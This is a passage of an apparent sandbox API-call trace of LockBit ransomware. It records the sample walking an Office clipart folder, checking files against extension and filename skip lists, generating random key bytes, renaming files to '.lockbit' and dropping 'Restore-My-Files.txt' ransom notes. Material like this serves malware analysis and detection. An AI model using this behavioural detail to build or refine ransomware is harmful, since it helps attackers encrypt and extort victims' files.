(lpString1="Restore-My-Files.txt", lpString2="NA01472_.WMF") returned 1 [0162.815] lstrcmpiW (lpString1="ntldr", lpString2="NA01472_.WMF") returned 1 [0162.815] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01472_.WMF") returned 1 [0162.815] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01472_.WMF") returned -1 [0162.815] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01472_.WMF") returned -1 [0162.815] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01472_.WMF") returned 1 [0162.816] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01472_.WMF") returned -1 [0162.816] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.816] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01472_.WMF") returned=".WMF" [0162.816] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.816] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.816] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.817] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.817] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.817] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.817] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.817] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01472_.WMF.lockbit") returned 72 [0162.817] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01472_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01472_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0162.818] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.818] malloc (_Size=0x40068) returned 0x3f70048 [0162.818] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=8232) returned 1 [0162.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0162.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.819] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0162.819] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0162.821] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01472_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01472_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.821] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.821] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.822] free (_Block=0x1fa2ed8) [0162.822] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01472_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.822] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.822] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.822] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82eb1b00, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x594f87d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x82eb1b00, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x28ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01473_.WMF", cAlternateFileName="")) returned 1 [0162.822] lstrcmpiW (lpString1=".", lpString2="NA01473_.WMF") returned -1 [0162.822] lstrcmpiW (lpString1="..", lpString2="NA01473_.WMF") returned -1 [0162.822] PathFindExtensionW (pszPath="NA01473_.WMF") returned=".WMF" [0162.822] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.822] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.822] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.822] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.822] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.822] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.822] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.822] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.823] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.823] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01473_.WMF") returned 1 [0162.824] lstrcmpiW (lpString1="ntldr", lpString2="NA01473_.WMF") returned 1 [0162.824] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01473_.WMF") returned 1 [0162.824] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01473_.WMF") returned -1 [0162.824] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01473_.WMF") returned -1 [0162.824] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01473_.WMF") returned 1 [0162.824] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01473_.WMF") returned -1 [0162.824] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.824] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01473_.WMF") returned=".WMF" [0162.824] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.824] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.824] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.825] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.825] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01473_.WMF.lockbit") returned 72 [0162.825] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01473_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01473_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0162.829] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.829] malloc (_Size=0x40068) returned 0x3df0008 [0162.829] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10414) returned 1 [0162.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.830] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01473_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01473_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.832] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.832] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.833] free (_Block=0x1fa2ed8) [0162.833] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01473_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.833] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.833] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.833] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f5def00, ftCreationTime.dwHighDateTime=0x1bd4af3, ftLastAccessTime.dwLowDateTime=0x594f87d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1f5def00, ftLastWriteTime.dwHighDateTime=0x1bd4af3, nFileSizeHigh=0x0, nFileSizeLow=0x349c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01474_.WMF", cAlternateFileName="")) returned 1 [0162.833] lstrcmpiW (lpString1=".", lpString2="NA01474_.WMF") returned -1 [0162.833] lstrcmpiW (lpString1="..", lpString2="NA01474_.WMF") returned -1 [0162.833] PathFindExtensionW (pszPath="NA01474_.WMF") returned=".WMF" [0162.833] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.833] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.833] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.833] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.833] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.833] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.833] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.834] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.834] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.835] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01474_.WMF") returned 1 [0162.835] lstrcmpiW (lpString1="ntldr", lpString2="NA01474_.WMF") returned 1 [0162.835] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01474_.WMF") returned 1 [0162.835] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01474_.WMF") returned -1 [0162.835] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01474_.WMF") returned -1 [0162.835] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01474_.WMF") returned 1 [0162.835] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01474_.WMF") returned -1 [0162.835] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.835] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01474_.WMF") returned=".WMF" [0162.835] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.836] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.836] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.837] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.837] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01474_.WMF.lockbit") returned 72 [0162.837] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01474_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01474_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.837] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.837] malloc (_Size=0x40068) returned 0x3e70008 [0162.838] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=13468) returned 1 [0162.838] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.838] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0162.838] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.838] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0162.839] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0162.845] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01474_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01474_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.845] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.845] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.846] free (_Block=0x1fa2ed8) [0162.846] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01474_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.846] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.846] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.846] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bb77a00, 